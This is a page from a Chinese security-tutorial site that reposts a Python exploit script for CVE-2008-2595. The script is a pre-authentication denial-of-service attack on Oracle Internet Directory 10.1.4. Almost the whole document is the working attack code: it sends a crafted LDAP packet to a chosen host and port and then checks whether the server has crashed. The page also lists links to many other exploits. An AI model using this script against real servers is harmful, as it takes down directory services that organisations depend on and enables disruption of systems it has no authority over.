• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit ,其中包含dxperience 10.1.4,final cut pro 10.1.4,directory,active directory,directory什么意思等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/python """
Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.
Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one
shoot, but even when you only send one packet it will crash. Tested: Win2000 x86, WinXP x86, Win2003 X86_64 Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es) Fixed: Oracle Critical Patch Update July 2008
CVEID: CVE-2008-2595
""" import sys
import time
import socket healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00"
packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\x03\x04\x02\x44\x4e\x80\x00" def checkHealth(hostname, port):
print " --> Wating 5 seconds"
time.sleep(5)

print " --> Connecting to target..."
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port)) try:
print " --> Sending 'health' packet ..."
s.sendall(healthPacket)
print " --> Trying to receive something..."
data = s.recv(1024)
except:
err = sys.exc_info()[1] if int(err[0]) == 104:
print "[ ] Exploits works!"
return if data != "":
print "[!] Server is up and running :("
else:
print "[?] Server doesn't answer nothing. It works?" def oidDos(hostname, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)
s.connect((hostname, int(port))) print "[ ] Sending packet..."
s.sendall(packet)
s.close() print "[ ] Checking OID's health..."
checkHealth(hostname, port)
except:
print sys.exc_info()[1] def usage():
print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"
print "Copyright (c) 2007 Joxean Koret"
print
print "Usage:"
print sys.argv[0],"-h<hostname> -p<port>"
print def main():
if len(sys.argv) != 3:
usage()
sys.exit(0)

hostname = None
port = None i = 0
for param in sys.argv:
i = 1

if i == 1:
continue

if param.startswith("-h"):
hostname = param[2:]
elif param.startswith("-p"):
port = int(param[2:])
else:
print "Unknown option '%s'" % param
usage()
sys.exit(1)

if not hostname or not port:
print "Bad command line."
usage()
sys.exit(1) oidDos(hostname, port) if __name__ == "__main__":
main()

</div>

您可能想查找下面的文章:

  • Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

相关文章

  • phsBlog 0.2 Bypass SQL Injection Filtering Exploit
  • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
  • Galatolo Web Manager 1.3a
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
  • WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
  • Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
  • Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
  • Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
  • webEdition CMS (we_objectID) Blind SQL Injection Exploit
  • AuraCMS

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
    • Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
    • tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
    • NoName Script
    • GeekLog
    • AuraCMS
    • Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
    • minb 0.1.0 Remote Code Execution Exploit
    • MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
    • Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有